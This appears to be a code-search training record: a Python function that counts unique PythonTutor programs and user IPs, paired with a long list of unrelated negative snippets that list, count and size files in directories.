def get_num_unique_programs_and_users(path, scenarios): unique_programs = set() valid_u_ids = set() for scenario in scenarios: valid_u_ids.add(scenario[0]["UniqueId"]) for filename in glob.iglob(path + 'PythonTutor_Input_Data_Sessions_20*/**/*.py', recursive=True): print(filename) x = filename[filename.rfind('/') + 1:filename.rfind('_')] if x not in valid_u_ids: continue with open(filename, 'r') as thisfile: blob = thisfile.read() unique_programs.add(blob) valid_ips = set() not_valid_ips = set() count = 0 for filename in glob.iglob(path + 'PythonTutor_Input_Data_Sessions_20*/**/*.json', recursive=True): x = filename[filename.rfind('/') + 1:filename.rfind('_a')] if x not in valid_u_ids: continue with open(filename, 'r') as thisfile: blob = json.load(thisfile) if blob["ip"] in not_valid_ips: pass elif blob["ip"] in valid_ips: valid_ips.remove(blob["ip"]) count += 1 not_valid_ips.add(blob["ip"]) else: valid_ips.add(blob["ip"]) print(count) print(len(valid_ips)) return unique_programs
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_folder_total(path):\n files = os.listdir(path)\n pythonfiles = ['%s/%s' % (path, filename) for filename in files if filename[-3:] == '.py']\n total = { 'net': 0, 'total': 0, 'nonblank': 0, 'num_inputs':0 }\n for filename in pythonfiles:\n with open(filename, 'r') as thisfile:\n blob = thisfile.read()\n # print filename\n thisloc = loc(blob)\n for k, v in thisloc.items():\n total[k] += v\n return total", "def loc():\n file_types = (\n ['Python', 'py', '#']\n )\n\n click.echo('Lines of code\\n-------------')\n\n click.echo(\"{0}: {1}\".format(file_types[0], count_locs(file_types[1],\n file_types[2])))\n\n return None", "def analyze_files(self):\n for file in os.listdir(self.directory):\n if file[-3:] == (\".py\"):\n fopen = open(os.path.join(self.directory, file), \"r\")\n try:\n if not (py_file := fopen):\n raise FileNotFoundError\n\n with py_file: # close file after opening\n class_count: int = 0\n fun_count: int = 0\n l_count: int = 0\n ch_count: int = 0\n for line in py_file: # calculate values for the file\n if line.strip().startswith(\"class \"):\n class_count = class_count+1\n elif line.strip().startswith(\"def \"):\n fun_count = fun_count+1\n\n l_count = l_count+1\n ch_count = ch_count+len(line)\n\n self.files_summary[str(os.path.join(self.directory, file))] = {\"class\": class_count, \"function\": fun_count, \"line\": l_count,\n \"char\": ch_count}\n except FileNotFoundError:\n print(f\"File {py_file} is not found or can not be opened\")\n fopen.close()", "def checkSum():\n val = 0\n for ext in EXTENSION_GLOBS:\n for f in glob.glob (ext):\n stats = os.stat(f)\n val += stats[stat.ST_SIZE] + stats[stat.ST_MTIME]\n return val", "def fileCounter(directory):", "def getFileLoc(self):\n\t\trval = []\n\t\tlocalVolTbl = self.file_loc['localVolTbl']\n\t\tnetVolTbl = self.file_loc['netVolTbl']\n\t\t\n\t\tif localVolTbl != None:\n\t\t\trval.extend((FILE_LOC[0],\n\t\t\t\tFILE_LOC[1] + self.file_loc['basePathname'] + \\\n\t\t\t\t\"\\\\\" + self.file_loc['remainPathname']))\n\t\n\t\t\tfor ii in range(len(VOL_TYPE)):\n\t\t\t\tif (self.header['file_attributes'] & (2 ** (ii + 1))) > 0:\n\t\t\t\t\trval.append(VOL_TYPE[ii])\n\t\t\t\t\n\t\t\trval.extend((FILE_LOC[2] + localVolTbl['volume_label'],\n\t\t\t\tFILE_LOC[3] + str(localVolTbl['vol_serial_num'])))\t\t\n\t\n\t\tif netVolTbl != None:\n\t\t\trval.append(FILE_LOC[4] + netVolTbl['net_sharename'] + \\\n\t\t\t\t\"\\\\\" + self.file_loc['remainPathname'])\n\t\treturn rval", "def check_dir(self):\n if not Path(self.src_dir).exists():\n print('No such directory found:', self.src_dir)\n return\n\n nc_all = self.src_dir + \"/*.nc*\"\n if len(glob.glob(nc_all)) == 0:\n print('No NetCDF files found in:', self.src_dir)\n return\n\n return nc_all", "def analyze_files(self):\n num_file = 0\n results = dict()\n try:\n list_files = os.listdir(self.directory)\n except FileNotFoundError:\n raise FileNotFoundError(\"Can't find any file\")\n else:\n for file in list_files: #looping the files in the directly\n num_file += 1\n if file.endswith(\".py\"): # Looking for files that end with .py\n try:\n fp = open(os.path.join(self.directory, file), \"r\")\n except FileNotFoundError:\n raise FileNotFoundError(f\"Can't open file no {num_file}\")\n else:\n with fp:\n c_total = 0 #Total length of Characters for the entire file\n filename = file # Storing the file name\n t_line = 0 # Getting the total number of line\n t_def = 0 #Getting the total number of functions\n t_class = 0 #Getting the total number of classes\n \n for line in fp:\n t_line += 1 # Counting each line\n t_char = len(line) #Length of characters for each line\n n_line = line.strip() # gets rid of white spaces and new lines\n c_total += t_char # adding each total char in line to the pervious total char in line\n if n_line.startswith(\"def \"): \n t_def += 1 \n elif n_line.startswith(\"class \"):\n t_class += 1\n results[filename] = {'class': t_class, 'function': t_def, 'line': t_line, 'char': c_total }\n return results", "def test_case_6():\n print(\"*********Test_case_6***********\")\n path = os.path.join(os.path.dirname(__file__), 'testdir', 't1.c')\n result = find_files('.c', path)\n print(result)", "def test_case_5():\n print(\"*********Test_case_5***********\")\n result = find_files('.c', \"\")\n print(result)", "def execute(root_dir):\n \n \n #Getting all the file recursively that py files\n lenght=[]\n libraries=[]\n nesting_factors=[]\n param_count=[]\n total_var=[]\n duplicate_for_the_repo=[]\n average_nesting_factor=0\n average_param=0\n code_duplication=0\n avg_var=0\n \n k=root_dir.rsplit('-')\n n=k[0]\n m=k[-1]\n \n urls=[ repo for repo in repo_list if n and m in repo ]\n if urls:\n url=urls[0]\n else:\n url=root_dir\n\n for filename in glob.iglob(root_dir + '/**/*.py', recursive=True):\n #filename=filename.replace(\" \", \"\\\\ \")\n filename=str_to_raw(filename)\n try: \n count=pygount.source_analysis(filename, 'pygount') # counting the line of codes for the py files\n l=count.code\n lenght.append(l)\n library =imported_module(filename)\n for lib in library:\n libraries.append(lib)\n deg_list=nesting_factor(for_loop_position(filename)) \n for deg in deg_list:\n nesting_factors.append(deg)\n\n\n\n for param in parameter_count(filename):\n param_count.append(param)\n for var in variable_count(filename):\n total_var.append(var)\n duplicate_for_the_repo.append(duplicated_line(filename))\n except Exception as e:\n print(\"type error: \" + str(e))\n print(filename)\n \n \n if len(nesting_factors) !=0: \n average_nesting_factor= np.mean(nesting_factors)\n if param_count: \n average_param= np.mean(param_count) \n libraries=unique(libraries)\n repo_count=sum(lenght)\n if total_var:\n avg_var=np.mean(total_var)\n if repo_count and duplicate_for_the_repo:\n code_duplication=(sum(duplicate_for_the_repo)/repo_count)*100\n \n return {'repository_url': url, \n 'number of lines': repo_count, \n 'libraries': libraries,\n 'nesting factor': average_nesting_factor,\n 'code duplication': code_duplication,\n 'average parameters':average_param,\n 'average variables':avg_var}", "def _get_run_info(self, path, creation_date):\n total = 0\n try:\n for entry in os.scandir(path):\n # Only evaluates size of files and not folders inside raw/proc\n if entry.is_file():\n # if it's a file, use stat() function\n total += entry.stat().st_size\n\n except NotADirectoryError:\n # if `path` isn't a directory, get the file size then\n total = os.path.getsize(path)\n except PermissionError:\n # if for whatever reason we can't open the folder, return 0\n return 0\n\n if os.path.isdir(path):\n validator = RunValidator(path)\n elif path.endswith(\".h5\"):\n validator = FileValidator(H5File(path).files[0])\n else:\n return 0\n\n try:\n validator.run_checks()\n except Exception:\n pass\n return total, str(ValidationError(validator.problems))", "def test_case_3():\n print(\"*********Test_case_3***********\")\n result = find_files('.c', None)\n print(result)", "def count_LOC(path):\n re_empty = re.compile(r\"[\\s]*(#|\\n|\\\"\\\"\\\")\")\n re_for = re.compile(r\"for.*in\")\n re_lambda = re.compile(r\"lambda\")\n re_if = re.compile(r\"if.*:\")\n re_def = re.compile(r\"def (?P<fname>\\w+)\\(\")\n\n total_LOC, indent_level = 0, 0\n cur_part = None\n parts = defaultdict(int)\n\n with open(path, 'r') as _file:\n for line in filter(lambda l : not re_empty.match(l), _file):\n\n extra = len( re_for.findall(line) ) - 1 + len( re_lambda.findall(line) ) - 1 + len( re_if.findall(line) ) -1\n\n if extra < 0: extra = 0\n\n total_LOC += 1 + extra\n if cur_part:\n parts[cur_part] += 1 + extra\n\n defs = re_def.search(line)\n if defs:\n cur_part = defs.groupdict()['fname']\n indent_level = first_non_whitespace(line)\n\n cur_indent = first_non_whitespace(line)\n if cur_indent < indent_level:\n cur_part = None\n indent_level = cur_indent\n\n return(total_LOC, parts)", "def getBaseSrcFile(self) -> List[int]:\n ...", "def checkSumHelper(arg, dirname, fnames):\n val = 0\n files = [name for name in fnames if os.path.splitext(name)[1] in EXTENSIONS]\n for file in files:\n absFile = os.path.join(dirname,file)\n try:\n stats = os.stat(absFile)\n except OSError,e:\n # This is to skip over temporary files or files\n # nosy doesn't have permission to access\n # print \"Nosy: skipping file %s with error %s\"%(absFile,e)\n continue\n val += stats[stat.ST_SIZE] + stats[stat.ST_MTIME]\n arg.append(val)\n return", "def test_case_1():\n print(\"*********Test_case_1***********\")\n path = os.path.join(os.path.dirname(__file__), 'testdir')\n result = find_files('.c', path)\n for file in result:\n print(file)", "def test_case_4():\n print(\"*********Test_case_4***********\")\n path = os.path.join(os.path.dirname(__file__), 'testdir')\n result = find_files('', path)\n for file in result:\n print(file)", "def print_local_output_files_stats():\n print \"\\n\\nFILES CREATED:\"\n for filename in os.listdir('../output'):\n filesize = os.path.getsize('../output/' + filename)\n print str(filesize) + \"\\t\" + filename\n print \"\\n\"", "def get_amount_of_data(directory: str):\n size = sum([os.path.getsize(os.path.join(directory, item)) for item in os.listdir(directory) if os.path.isfile(os.path.join(directory, item))])\n print(size)\n return size", "def readfiles(self, dirname , search , notsearch = 'rgvar' , notdir = 'xyvwa'):\n print('We are in the following directory: %s looking for files that contain %s and not %s' %(dirname, search , notsearch))\n dirlist = os.listdir(dirname)\n for filep in dirlist:\n filep = os.path.join(dirname,filep) \n if os.path.islink(filep):\n pass\n elif os.path.isdir(filep):\n m = re.search(notdir , filep)\n if m is None:\n self.readfiles(filep , search, notsearch = notsearch, notdir = notdir )\n elif os.path.isfile(filep) and '.dat' in filep: \n nm = re.search(notsearch, filep)\n m = re.search(search , filep)\n #print m , nm\n if m is not None and nm is None:\n self.plotfiles.append(filep)\n else:\n pass", "def my_root_listdir(root_dir):\n root_listdir = [\n images_dir\n for images_dir in os.listdir(root_dir)\n if not any(\n characters in images_dir for characters in [\".\", \"test\", \"train\", \"valid\"]\n )\n ]\n summ = 0\n for images_dir in root_listdir:\n summ += len(os.listdir(root_dir + \"/\" + images_dir)) / 2 - 2\n print(\"Sum of images in directories: \", int(summ))\n return root_listdir", "def retrive_scanning_scheme(self, Nest_data_directory, file_keyword = 'PMT_0Zmax'):\r\n fileNameList = []\r\n# ImgSequenceNum = 0\r\n for file in os.listdir(Nest_data_directory):\r\n if file_keyword in file:\r\n fileNameList.append(file)\r\n \r\n RoundNumberList = []\r\n CoordinatesList = []\r\n for eachfilename in fileNameList:\r\n # Get how many rounds are there\r\n try:\r\n RoundNumberList.append(eachfilename[eachfilename.index('Round'):eachfilename.index('_Grid')])\r\n except:\r\n RoundNumberList.append(eachfilename[eachfilename.index('Round'):eachfilename.index('_Coord')])\r\n \r\n RoundNumberList = list(dict.fromkeys(RoundNumberList)) # Remove Duplicates\r\n \r\n CoordinatesList.append(eachfilename[eachfilename.index('Coord'):eachfilename.index('_PMT')])\r\n CoordinatesList = list(dict.fromkeys(CoordinatesList))\r\n \r\n# print(RoundNumberList, CoordinatesList, fileNameList)\r\n return RoundNumberList, CoordinatesList, fileNameList", "def add_loc(self):\n self.loc = 0\n for t in self.thys:\n with open(t, 'r') as f:\n for l in f:\n if l.strip():\n self.loc += 1", "def process_files(file_location, day):\n # construct file path\n file_dir = PREFIX+file_location\n file_pattern = file_dir+'lz_'+day+'*_raw.root'\n # print(file_pattern)\n file_list = glob.glob(file_pattern)\n print(\"There are %s MC files in the requested directory (%s).\" %(len(file_list), file_dir))\n file_names = []\n for f in file_list:\n file_name_only = f.split('/')\n file_names.append(file_name_only[-1])\n return file_names", "def scan(self,project_dir):\n ftypes = [\".csv\", \".data\", \".xlsx\"]\n print(\"Scanning directory : \",project_dir)\n print(\"Searching for : \",ftypes)\n self.localfiles = {}\n for dirpath, dirnames, filenames in os.walk(project_dir, topdown=True):\n for filename in filenames:\n for ftype in ftypes:\n if ftype in filename:\n self.localfiles[filename] = {\n \"filename\": filename,\n \"filesize\": getsize(os.path.join(dirpath, filename)),\n \"abspath\": os.path.join(dirpath, filename),\n \"dirpath\": dirpath,\n \n }\n print(\"Found These: \",[file_name for file_name in self.localfiles.keys()])", "def getFilePaths():\n \n image_dir = r'/hpc/wfok007/mpi_heart/Training Set'\n mask_paths = []\n image_paths = []\n for root, dirs, files in os.walk(image_dir, topdown=False):\n for name in files:\n if name == 'laendo.nrrd':\n mask_paths.append(os.path.join(root, name))\n elif name == 'lgemri.nrrd':\n image_paths.append(os.path.join(root, name))\n else:\n print ('%s is unknown' %name)\n return mask_paths, image_paths", "def total_files(self):\n command = \"SELECT searched FROM options;\"\n return self.c.execute(command)", "def get_checkpoint():\n\timport numpy as np\n\n\tcheckpoint = []\n\tfor directory in directories:\n\t\ttry: # try to find folder\n\t\t\tos.chdir('./'+directory)\n\t\texcept:\n\t\t\tcontinue\n\t\tcontents = os.listdir('./')\n\t\tif contents == []: # if folder is empty\n\t\t\tprint(\"No data for\", directory)\n\t\t\tos.chdir('..')\n\t\t\tcontinue\n\t\tcounter = []\n\t\tfor entry in contents:\n\t\t\tentry = entry.split('.')\n\t\t\tnum = entry[0][2:]\n\t\t\ttry: # excludes files that aren't of type x-y.jpg\n\t\t\t\tnum = int(num)\n\t\t\t\tcounter.append(num)\n\t\t\texcept:\n\t\t\t\tcontinue\n\t\tcheckpoint.append(max(counter))\n\t\tos.chdir('..')\n\tcheckpoint = np.mean(checkpoint)\n\treturn checkpoint", "def target_totalfiles(self):\n return self._cfg.get('totalfiles', None)", "def test_case_2():\n print(\"*********Test_case_2***********\")\n path = os.path.join(os.path.dirname(__file__), 'testdir')\n result = find_files(None, path)\n print(result)", "def fs_files_total(self):\n return self._fs_files_total", "def scanFiles(directory, includes = [\"*\"], excludes = []):\n\treturn scanAll(directory, includes, excludes)[1]", "def test_search_file(self):\n base_dir = join(get_current_path(), 'samples', 'base_dir1')\n output_dir = join(get_current_path(), 'samples', 'base_dir1', 'result')\n files = search_files(base_dir, output_dir)\n self.assertTrue(self.verify_sub_folders(list(files.keys())))\n\n # sub folders under Concord is not counted, only files\n self.assertEqual(len(files['Concord']), 5)\n self.assertEqual(len(files['ListCo Equity']), 1)\n self.assertEqual(len(files['CLO Equity']), 2)\n self.assertEqual(files['ListCo Equity'][0], join(base_dir, 'ListCo Equity', 'Positions1219.xlsx'))", "def gather_counts(directory):\n counts_un = defaultdict(int)\n counts_bi = defaultdict(int)\n counts_tri = defaultdict(int)\n prev_prev = \"<s>\"\n prev = \"<s>\"\n for filename in os.listdir(f\"./{directory}\"):\n if \".DS_Store\" in filename:\n continue\n with open(f\"./{directory}/{filename}\", \"r\") as f:\n for line in f:\n line = line.strip()\n if len(line) == 0:\n continue\n counts_un[line+\"\\n\"] += 1\n counts_bi[prev+\"\\n\"+line+\"\\n\"] += 1\n counts_tri[prev_prev+\"\\n\"+prev+\"\\n\"+line+\"\\n\"] += 1\n prev_prev = prev\n prev = line\n counts_un[\"</s>\\n\"] += 2\n counts_bi[\"</s>\\n</s>\\n\"] += 1\n counts_bi[prev+\"\\n\"+\"</s>\\n\"] += 1\n counts_tri[prev_prev+\"\\n\"+prev+\"\\n\" + \"</s>\\n\"] += 1\n counts_tri[prev+\"\\n</s>\\n</s>\\n\"] += 1\n return counts_un, counts_bi, counts_tri", "def get_all_metrics(dir):\r\n file_lst = os.listdir(dir)\r\n file_lst = list(filter(lambda x: re.findall(r'\\.csv$',x), file_lst))\r\n return file_lst", "def current_missing(**kwargs) -> int:\n data_path = os.environ.get(BBG_ROOT, '').replace('\\\\', '/')\n if not data_path: return 0\n return len(files.all_files(f'{data_path}/Logs/{missing_info(**kwargs)}'))", "def getNtot(self,dir):\n return int(readfile(dir + '/struct_enum.out')[-1].split()[0])", "def test_known_file_locations(dataset: linux.LinuxSourcesDataset):\n assert (dataset.src_tree_root / \"kernel\" / \"kexec.c\").is_file()\n assert (dataset.src_tree_root / \"kernel\" / \"smpboot.h\").is_file()", "def usagestats_parse(dirpath):\r\n # Create database\r\n # TODO: change to an easier format, probably json.\r\n db, cursor = create_table()\r\n\r\n # Some vars for logging\r\n processed = 0\r\n err = 0\r\n\r\n # Iterate through the /usagestats/ directory and fetch all files\r\n for root, dirnames, filenames in os.walk(dirpath, topdown=True, onerror=None, followlinks=False):\r\n if 'daily' in root or 'weekly' in root or 'monthly' in root or 'yearly' in root:\r\n # Retrieve the folder name to save what the frequency of the usagestats were:\r\n frequency = root.split('/')[-1]\r\n for filename in filenames:\r\n # Check if filename is only numbers (which is an epoch time representation)\r\n if filename.isnumeric():\r\n try:\r\n tree = ET.parse(os.path.join(root, filename))\r\n except ET.ParseError:\r\n parse_file_with_protobuf(os.path.join(root, filename), db)\r\n continue\r\n\r\n # We have sucessfully parsed the usagestats xml.\r\n # So continue processing\r\n tree_root = tree.getroot()\r\n\r\n for elem in tree_root:\r\n parse_sub_elements(frequency, elem, filename, db)\r\n\r\n # query for reporting\r\n cursor.execute('''\r\n select \r\n usage_type,\r\n datetime(lastime/1000, 'UNIXEPOCH', 'localtime') as lasttimeactive,\r\n timeactive as time_Active_in_msecs,\r\n timeactive/1000 as timeactive_in_secs,\r\n case last_time_service_used WHEN '' THEN ''\r\n ELSE datetime(last_time_service_used/1000, 'UNIXEPOCH', 'localtime')\r\n end last_time_service_used,\r\n case last_time_visible WHEN '' THEN ''\r\n ELSE datetime(last_time_visible/1000, 'UNIXEPOCH', 'localtime') \r\n end last_time_visible,\r\n total_time_visible,\r\n app_launch_count,\r\n package,\r\n CASE types\r\n WHEN '1' THEN 'MOVE_TO_FOREGROUND'\r\n WHEN '2' THEN 'MOVE_TO_BACKGROUND'\r\n WHEN '5' THEN 'CONFIGURATION_CHANGE'\r\n WHEN '7' THEN 'USER_INTERACTION'\r\n WHEN '8' THEN 'SHORTCUT_INVOCATION'\r\n ELSE types\r\n END types,\r\n classs,\r\n source,\r\n fullatt\r\n from data\r\n order by lasttimeactive DESC\r\n ''')\r\n all_rows = cursor.fetchall()\r\n\r\n # HTML report section\r\n h = open('./Report.html', 'w')\r\n h.write('<html><body>')\r\n h.write('<h2>Android Usagestats report (Dates are localtime!)</h2>')\r\n h.write('<style> table, th, td {border: 1px solid black; border-collapse: collapse;}</style>')\r\n h.write('<br />')\r\n\r\n # HTML headers\r\n h.write('<table>')\r\n h.write('<tr>')\r\n h.write('<th>Usage Type</th>')\r\n h.write('<th>Last Time Active</th>')\r\n h.write('<th>Time Active in Msecs</th>')\r\n h.write('<th>Time Active in Secs</th>')\r\n h.write('<th>Last Time Service Used</th>')\r\n h.write('<th>Last Time Visible</th>')\r\n h.write('<th>Total Time Visible</th>')\r\n h.write('<th>App Launch Count</th>')\r\n h.write('<th>Package</th>')\r\n h.write('<th>Types</th>')\r\n h.write('<th>Class</th>')\r\n h.write('<th>Source</th>')\r\n h.write('</tr>')\r\n\r\n for row in all_rows:\r\n usage_type = row[0]\r\n lasttimeactive = row[1]\r\n time_Active_in_msecs = row[2]\r\n timeactive_in_secs = row[3]\r\n last_time_service_used = row[4]\r\n last_time_visible = row[5]\r\n total_time_visible = row[6]\r\n app_launch_count = row[7]\r\n package = row[8]\r\n types = row[9]\r\n classs = row[10]\r\n source = row[11]\r\n\r\n processed = processed + 1\r\n # report data\r\n h.write('<tr>')\r\n h.write('<td>' + str(usage_type) + '</td>')\r\n h.write('<td>' + str(lasttimeactive) + '</td>')\r\n h.write('<td>' + str(time_Active_in_msecs) + '</td>')\r\n h.write('<td>' + str(timeactive_in_secs) + '</td>')\r\n h.write('<td>' + str(last_time_service_used) + '</td>')\r\n h.write('<td>' + str(last_time_visible) + '</td>')\r\n h.write('<td>' + str(total_time_visible) + '</td>')\r\n h.write('<td>' + str(app_launch_count) + '</td>')\r\n h.write('<td>' + str(package) + '</td>')\r\n h.write('<td>' + str(types) + '</td>')\r\n h.write('<td>' + str(classs) + '</td>')\r\n h.write('<td>' + str(source) + '</td>')\r\n h.write('</tr>')\r\n\r\n # HTML footer\r\n h.write('<table>')\r\n h.write('<br />')\r\n\r\n print('')\r\n print('Records processed: ' + str(processed))\r\n print('Triage report completed. See Reports.html.')", "def avail(self):\n\n return os.listdir(self.datadir)", "def checkSumWalk(top=\".\", func=checkSumHelper):\n values = []\n os.path.walk( top, checkSumHelper, values )\n return sum(values)", "def MainStats(path, filetype, NrExp, col, start, stop):\n# path= path.split('/') # here is better to google and see what is going on. Or experiment alone\n# path= \"/\".join(path[:-1]) \n dato=ExtractData_raw_files(path, filetype)\n dBase=dato.createDictBase()\n stats = Stats(dBase, NrExp, col, start, stop)\n means, stds=stats.Means_Stds()\n times = stats.time_return()\n return means , stds, times", "def _get_filepaths(self):\n self._printer(str(self.__len__()) + \" file paths have been parsed in \" + str(self.timer.end))\n if self._hash_files:\n return pool_hash(self.filepaths)\n else:\n return self.filepaths", "def totalFiles(pathCopyData, pathNetCDF, dateInit, dateFinal):\n dateInit = datetime.strptime(dateInit, '%Y-%m-%d')\n dateFinal = datetime.strptime(dateFinal, '%Y-%m-%d')\n dirr = pathCopyData\n dirr2 = pathNetCDF\n #name = 'wrfout_c1h_d01_\\d\\d\\d\\d-\\d\\d-\\d\\d_00:00:00.\\d\\d\\d\\d.nc'\n name = 'wrfout_c1h_d01_\\d\\d\\d\\d-\\d\\d-\\d\\d_00:00:00.a\\d\\d\\d\\d'\n date = '\\d\\d\\d\\d-\\d\\d-\\d\\d'\n fil = []\n ba = []\n patron2 = re.compile(date)\n patron = re.compile(name + '.*')\n for base, dirs, files in os.walk(dirr2, topdown=True):\n for value in files:\n if patron.match(value) != None:\n f = patron2.findall(value)\n dateNetCDF = datetime.strptime(f[0], '%Y-%m-%d')\n if (dateNetCDF < dateFinal) & (dateNetCDF > dateInit):\n fil.append(value)\n ba.append(base)\n fdata = df.DataFrame(fil, columns=['nameFile'])\n fbase = df.DataFrame(ba, columns=['nameBase'])\n fdata.to_csv(dirr + 'tfile.txt', encoding='utf-8', index=False)\n fbase.to_csv(dirr + 'tbase.txt', encoding='utf-8', index=False)", "def totalfiles(self):\n return len([sz for sz in self.iterate()])", "def lsinfo(path):", "def enumerate():\n names = [f for f in os.listdir(_INPUT_ROOT) if not\n os.path.isdir(os.path.join(_INPUT_ROOT, f))]\n return sorted(names)", "def test_scan_dir_files(self):\n self.run_scan(self.subdir, self.nest_fcount + 1)", "def _find_files(directory, dirs_to_look_in, files_to_search_for, \n current_dir, see_files):\n full_name = True\n if see_files:\n full_name = False\n files_to_load = search_directory(directory, \n look_in=dirs_to_look_in,\n search_for=files_to_search_for,\n file_type='files',\n current_dir=current_dir,\n full_name=full_name)\n if not files_to_load:\n raise UserWarning('No files were found matching the search for %s'\\\n ' in the directory(s) %s%s' \\\n % (files_to_search_for, directory, \n dirs_to_look_in))\n return files_to_load", "def findFiles(self):\n\n with open('analysis_result/firmwalkerOutput.txt', 'r') as firmwalker:\n for line in firmwalker:\n if line.startswith('##################################### ssh'):\n self.ssh = next(firmwalker).strip('d/').strip('\\n')\n elif line.startswith('##################################### dropbear'):\n self.dropbear = next(firmwalker).strip('d/').strip('\\n')\n elif line.startswith('##################################### busybox'):\n self.busyBox = next(firmwalker).strip('d/').strip('\\n')\n elif line.startswith('##################################### telnet'):\n self.telnet = next(firmwalker).strip('d/').strip('\\n')\n elif line.startswith('##################################### openssl'):\n self.openssl = next(firmwalker).strip('d/').strip('\\n')", "def missing_in_gn_by_file(self):\n return self._missing_gn_files", "def find_all_infilepaths(in_dir):\n workdir = os.getcwd()\n os.chdir(in_dir)\n\n infiles_paths = dict()\n for infilename in glob.glob(\"[0-9]*_[0-9]*_[0-9]*.hdf5\"):\n pos = infilename.split('_')\n pos[-1] = pos[-1].split('.')[0]\n pos = tuple(list(map(lambda s: int(s), pos)))\n num_pos = _3d_to_numeric\n infiles_paths[num_pos] = os.path.join(in_dir, infilename)\n\n os.chdir(workdir)\n return infiles_paths", "def dataStats(reportsDir = \"./reports/\"):\n legMulti = glob.glob(reportsDir+\"/leg/*.json\")\n legOne = glob.glob(reportsDir+\"/leg/oneproc/*.json\")\n legBroken = glob.glob(reportsDir+\"/leg/broken/*.json\")\n \n malMulti = glob.glob(reportsDir+\"/mal/*.json\")\n malOne = glob.glob(reportsDir+\"/mal/oneproc/*.json\")\n malBroken = glob.glob(reportsDir+\"/mal/broken/*.json\")\n \n print(\"\"\"Legal files:\n Total: {0}, One-proc: {1}, Multi-proc: {2}, Broken: {3} \"\"\"\n .format(len(legBroken+legMulti+legOne), len(legOne), len(legMulti), len(legBroken)))\n print(\"\"\"Malicious files:\n Total: {0}, One-proc: {1}, Multi-proc: {2}, Broken: {3} \"\"\"\n .format(len(malBroken+malMulti+malOne), len(malOne), len(malMulti), len(malBroken)))\n print(\"Working samples: {0}\".format(len(malMulti+malOne+legMulti+legOne)))", "def dirsize(self):\n total = 0\n for p in self.select_file(recursive=True):\n try:\n total += p.size\n except: # pragma: no cover\n print(\"Unable to get file size of: %s\" % p)\n return total", "def list_sources(config, base_dir, verbose=False):\n for source in config.sources_under(abspath(base_dir)):\n if verbose:\n print(\"# %s (%s)\" % (source.nicedir, ' '.join(source.info)))\n else:\n print(source.nicedir)", "def count_total_line():\n count = 0\n file_count = 0\n for filename in os.listdir('.'):\n if filename.endswith(\".json\"):\n file_count += 1\n with open(filename, 'r', encoding='utf8') as f:\n for line in f:\n count += 1\n print(\"There are {0} lines in {1} json files\".format(count, file_count))", "def _local_dir(self):\n return []", "def check_init_files_and_folders():\n\t#['cascade_wimb_bus_front_100_stages_1000_pos_3000_neg.xml', 'cascade_wimb_bus_front_33_stages_1000_pos_3000_neg_wrong.xml', 'color_detect_2.py', 'dedupe.py', 'detect_image_group_ku.py', 'detect_shape_5.py', 'get_cam_id_2.py', 'get_image_8.py', 'gui_hsv.py', 'knaps.py', 'knapsack_2.py', 'maps.html', 'program_detect_rectangle.zip', 'start_capture.py']\n\tfile_list=[\n\t#'cascade_wimb_bus_front_100_stages_1000_pos_3000_neg.xml', \n\t'models/cascade_wimb_bus_front_33_stages_1000_pos_3000_neg_wrong.xml', \n\t#'color_detect_2.py', \n\t#'dedupe.py', \n\t'detect_bus_haar_group.py', \n\t#'detect_shape_5.py', \n\t'get_cam_detail.py', \n\t'get_image.py', \n\t#'gui_hsv.py', \n\t#'knaps.py', \n\t#'knapsack_2.py', \n\t#'maps.html', \n\t#'program_detect_rectangle.zip', \n\t'start_wimb.py',\n\t'g.php',\n\t]\n\tdirectory_list=[\n\t'images',\n\t'images_bgs',\n\t'images_bgs_mask',\n\t#'images_bgs_result',\n\t'images_color',\n\t'images_haar',\n\t'images_haar_result',\n\t'images_number',\n\t'images_number_result',\n\t'models',\n\t'images_old',\n\t'text_number',\n\t]\n\t\n\tfor file_name in file_list: print 'file '+file_name+' existed: '+str(os.path.isfile(file_name))\n\tfor directory_name in directory_list: \n\t\tprint 'directory '+directory_name+' existed: '+str(os.path.isdir(directory_name))\n\t\tif not os.path.isdir(directory_name): \n\t\t\tos.makedirs(directory_name)\n\t\tif \"images\" in directory_name: shutil.copy(path+'/g.php',path+'/'+directory_name+'/g.php')", "def get_num_samples(org_dir, file_names):\n count = 0\n # Loop through the files, which then loop through the trees\n for filename in file_names:\n # Skip files that are not .mrg\n if not filename.endswith('.mrg'):\n continue\n # File is .mrg. Start processing\n file_dir = os.path.join(org_dir, filename)\n with open(file_dir, 'r', encoding='utf-8') as reader:\n content = reader.readlines()\n for _ in content:\n count += 1\n\n return count", "def _get_total_games(self) -> int:\n files = get_tfr_filenames(self.config)\n total_games = 0\n for file in files:\n total_games += int(str(file).split('-')[1].split('.')[0])\n return total_games", "def _discover_in_dir(self, dir_path: str) -> Optional[str]:\n for this_file in os.listdir(dir_path):\n if this_file.endswith('.esvi'):\n return os.path.join(dir_path, this_file)\n\n return None", "def all_loci():\n for fname in listdir(join(DATA_PATH, 'loci')):\n try:\n yield fetch_locus(fname)\n except Exception as e:\n print(f'{repr(e)} fetching {fname}')", "def list_dir(self, path):", "def n_file(self):\n self.assert_is_dir_and_exists()\n n = 0\n for _ in self.select_file(recursive=True):\n n += 1\n return n", "def find_vasp_calculations():\n dir_list = [\n \"./\" + re.sub(r\"vasprun\\.xml\", \"\", path)\n for path in glob.iglob(\"**/vasprun.xml\", recursive=True)\n ]\n gz_dir_list = [\n \"./\" + re.sub(r\"vasprun\\.xml\\.gz\", \"\", path)\n for path in glob.iglob(\"**/vasprun.xml.gz\", recursive=True)\n ]\n return dir_list + gz_dir_list", "def findMayaFiles(directory):\n\n pass", "def __calculate_current_row(self):\n last_data_file = None\n location = os.listdir(self.path)\n #Remove non-data files from our list of dirs.\n location = [element for element in location if 'data' in element]\n #Sort as integers so we get them in the right order.\n location = sorted(location, key=lambda x: int(x.split('.')[0].split('_')[1]), reverse = True)\n for f in location:\n if f[0:4] == 'data':\n last_line = None\n with open(self.path + '/' + f, 'r') as f:\n for line in f:\n if len(line) > 1:\n last_line = line\n if last_line:\n return json.loads(line)['row_id']\n\n return 0", "def _rnlst(self, path, filelist):\n path = self._cleanpath(path)\n dirdict = self.parsedir(path)\n print(dirdict)\n \n trycwds = dirdict.get('trycwds', [])\n names = dirdict.get('names', [])\n \n for trycwd, name in zip(trycwds, names): \n if trycwd: # name is a directory\n self._rnlst(self.remotepathsep.join([path, name]), filelist)\n else: \n filelist.append(self.remotepathsep.join([path, name]))\n \n return filelist", "def find_all_files(self):\n look4files = [ f for f in listdir(self.file_location) if 